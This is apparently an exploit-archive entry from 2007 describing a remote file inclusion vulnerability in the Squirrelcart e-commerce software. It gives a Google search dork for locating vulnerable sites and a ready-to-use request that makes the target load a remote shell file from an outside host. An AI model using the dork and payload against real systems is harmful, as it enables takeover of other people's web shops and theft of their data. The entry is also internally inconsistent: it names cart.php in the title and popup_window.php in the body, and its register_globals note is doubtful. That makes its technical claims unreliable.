Squirrelcart <= 1.x.x (cart.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Squirrelcart <= 1.x.x (cart.php) Remote File Inclusion Vulnerability
# Published : 2007-08-19
# Author : ShaiMagal
# Previous Title : Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability
# Next Title : GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability

Title           : Squirrelcart <= 1.x.x Remote File Inclusion
URL             : http://squirrelcart.com/
Google Dork     : inurl:"/squirrelcart/" -squirrelcart.com
Author          : ShaiMagal

Vulnerable file : popup_window.php ->* config.php*, line 13 - $site_isp_root = "blablabla";

Exploit         : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt?

notes		: register_globals = off is needed it seems.

# www.Syue.com [2007-08-19]